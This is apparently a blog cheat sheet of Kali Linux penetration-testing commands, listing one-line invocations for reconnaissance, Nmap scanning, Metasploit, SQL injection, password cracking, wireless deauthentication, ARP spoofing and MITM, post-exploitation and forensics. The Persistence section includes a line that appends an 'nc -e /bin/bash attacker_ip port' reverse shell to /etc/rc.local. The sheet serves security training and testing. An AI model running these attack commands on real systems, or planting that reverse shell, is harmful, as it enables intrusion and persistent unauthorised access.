Kali Linux Command Cheat Sheet
The ultimate reference guide for penetration testing tools and commands
Table of Contents
- Introduction to Kali Linux
- System Commands
- Network Commands & Utilities
- Information Gathering
- Vulnerability Scanning
- Exploitation Tools
- Web Application Tools
- Password Attacks
- Wireless Attacks
- Sniffing & Spoofing
- Post Exploitation
- Digital Forensics
- Reporting Tools
- Social Engineering
- Anonymity Tools
- Bash Scripting for Pentesters
Introduction to Kali Linux
Kali Linux is a Debian-based Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security and comes pre-installed with numerous security tools.
Basic System Information
uname -a
Display system information including kernel version
cat /etc/os-release
Show Kali Linux version information
df -h
Check disk space usage
free -m
Display memory usage
Package Management
sudo apt update && sudo apt upgrade
Update package lists and upgrade packages
sudo apt install package_name
Install a new package
sudo apt remove package_name
Remove a package
sudo apt list –installed | grep keyword
Search for installed packages
System Commands
File System Navigation
ls -la
List all files with details
find / -name filename 2>/dev/null
Find files by name, hiding error messages
locate filename
Quickly locate files using database
updatedb
Update the locate database
User Management
sudo useradd -m username
Create a new user with home directory
sudo passwd username
Set or change password for a user
sudo usermod -aG sudo username
Add user to sudo group
id
Display current user ID and groups
Process Management
ps aux
Display all running processes
kill PID
Kill a process by its PID
killall process_name
Kill all processes with the given name
top
Display and manage running processes
Network Commands & Utilities
Network Configuration
ifconfig
Display network interfaces and IP addresses
ip a
Modern alternative to ifconfig
iwconfig
Display wireless network interfaces
route -n
Display routing table
Network Troubleshooting
ping target
Test connectivity to a host
traceroute target
Trace route to a host
mtr target
Combines ping and traceroute for network diagnostics
netstat -tuln
Show listening ports and established connections
Information Gathering
DNS Reconnaissance
host domain.com
Perform DNS lookup
dig domain.com any
Detailed DNS lookup with all records
dnsenum domain.com
Enumerate DNS information
dnsrecon -d domain.com
DNS reconnaissance tool
Subdomain Enumeration
sublist3r -d domain.com
Fast subdomain enumeration tool
amass enum -d domain.com
In-depth attack surface mapping tool
gobuster dns -d domain.com -w /usr/share/wordlists/dirb/common.txt
Brute force DNS subdomains
fierce –domain domain.com
DNS reconnaissance tool
WHOIS & IP Information
whois domain.com
Query WHOIS information for a domain
whois IP_address
Query WHOIS information for an IP address
theHarvester -d domain.com -b all
Gather emails, subdomains, hosts, etc.
recon-ng
Full-featured reconnaissance framework
Vulnerability Scanning
Port Scanning with Nmap
nmap -sS target
SYN scan (default, stealthy)
nmap -sV -sC target
Service version detection + default scripts
nmap -p- target
Scan all 65535 ports
nmap -A target
Aggressive scan (OS detection, version detection, script scanning, and traceroute)
nmap -sU target
UDP port scan
nmap –script vuln target
Scan for vulnerabilities
masscan -p1-65535 target –rate=1000
Fast port scanner
unicornscan target:1-65535
Flexible and efficient port scanner
Vulnerability Scanners
nikto -h target
Web server scanner
openvas-setup
Set up OpenVAS vulnerability scanner
searchsploit keyword
Search for exploits in Exploit-DB
wpscan –url http://example.com –enumerate u
WordPress vulnerability scanner
Exploitation Tools
Metasploit Framework
msfconsole
Start Metasploit console
search exploit_name
Search for exploits in Metasploit
use exploit_path
Select an exploit to use
show options
Display options for the selected exploit
Exploitation Examples
exploit
Run the selected exploit
sessions -l
List active sessions
sessions -i session_id
Interact with a specific session
background
Background the current session
Other Exploitation Tools
sqlmap -u http://example.com/page?id=1
Automated SQL injection tool
hydra -l username -P wordlist.txt service://target
Brute force login tool
john –wordlist=wordlist.txt hashfile
Password cracking tool
burpsuite
Web application security testing tool
Web Application Tools
Web Vulnerability Scanning
nikto -h http://example.com
Web server vulnerability scanner
wpscan –url http://example.com –enumerate u
WordPress vulnerability scanner
dirb http://example.com /usr/share/wordlists/dirb/common.txt
Web directory brute force tool
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt
Fast directory brute force tool
Web Exploitation
sqlmap -u http://example.com/page?id=1
Automated SQL injection tool
xsser -u http://example.com
Automated XSS testing tool
commix -u http://example.com/page.php?id=1
Automated command injection tool
burpsuite
Web application security testing tool
Password Attacks
Password Cracking
john –wordlist=wordlist.txt hashfile
Password cracking tool
hashcat -m hash_type -a attack_mode hashfile wordlist.txt
Advanced password recovery tool
hydra -l username -P wordlist.txt service://target
Brute force login tool
crunch min_length max_length charset -o wordlist.txt
Wordlist generator
Wireless Attacks
Wireless Reconnaissance
airodump-ng interface
Capture wireless packets
wash -i interface
Detect WPS-enabled networks
kismet
Wireless network detector
wifite
Automated wireless attack tool
Wireless Exploitation
aireplay-ng –deauth count -a BSSID -c client interface
Deauthentication attack
reaver -i interface -b BSSID
WPS PIN brute force attack
bully interface -b BSSID
WPS PIN brute force attack
fern-wifi-cracker
GUI-based wireless attack tool
Sniffing & Spoofing
Packet Sniffing
tcpdump -i interface
Capture network traffic
wireshark
GUI-based packet analyzer
tshark -i interface
Command-line packet analyzer
ettercap -T -i interface
Network sniffing and MITM tool
Spoofing & MITM
arpspoof -i interface -t target -r gateway
ARP spoofing tool
mitmproxy
Interactive TLS-capable intercepting proxy
bettercap -iface interface
Swiss army knife for network attacks
driftnet -i interface
Capture and display images from network traffic
Post Exploitation
Privilege Escalation
sudo -l
List available sudo privileges
find / -perm -u=s -o -perm -g=s 2>/dev/null
Find SUID/SGID files
linpeas.sh
Linux privilege escalation script
unix-privesc-check
Unix privilege escalation checker
Persistence
crontab -e
Edit cron jobs for persistence
echo “nc -e /bin/bash attacker_ip port” >> /etc/rc.local
Add reverse shell to rc.local
ssh-keygen -t rsa
Generate SSH keys for persistence
chkconfig –add service
Add a service for persistence
Digital Forensics
File Analysis
strings file
Extract strings from a binary file
binwalk file
Analyze and extract firmware images
foremost -i file
File carving tool
volatility -f memory_dump imageinfo
Analyze memory dumps
Disk Analysis
fdisk -l
List disk partitions
dd if=/dev/sda of=image.img
Create a disk image
testdisk
Partition recovery tool
photorec
File recovery tool
Reporting Tools
Report Generation
dradis
Collaborative reporting tool
faraday
Collaborative pentest platform
magictree
Penetration test data organizer
serpico
Report generation tool
Anonymity Tools
Tor & Proxychains
service tor start
Start Tor service
proxychains command
Run a command through proxychains
torsocks command
Run a command through Tor
macchanger -r interface
Randomize MAC address
Bash Scripting for Pentesters
Basic Scripting
#!/bin/bash
Shebang for bash scripts
echo “Hello, World!”
Print text to the terminal
read -p “Enter input: ” variable
Read user input into a variable
if [ condition ]; then command; fi
Basic if statement
Advanced Scripting
for i in {1..10}; do command; done
For loop example
while [ condition ]; do command; done
While loop example
case variable in pattern1) command1;; pattern2) command2;; esac
Case statement example
function name() { commands; }
Function definition
Discover more from Cyber Samir
Subscribe to get the latest posts sent to your email.
Social Engineering
Social Engineering Toolkit (SET)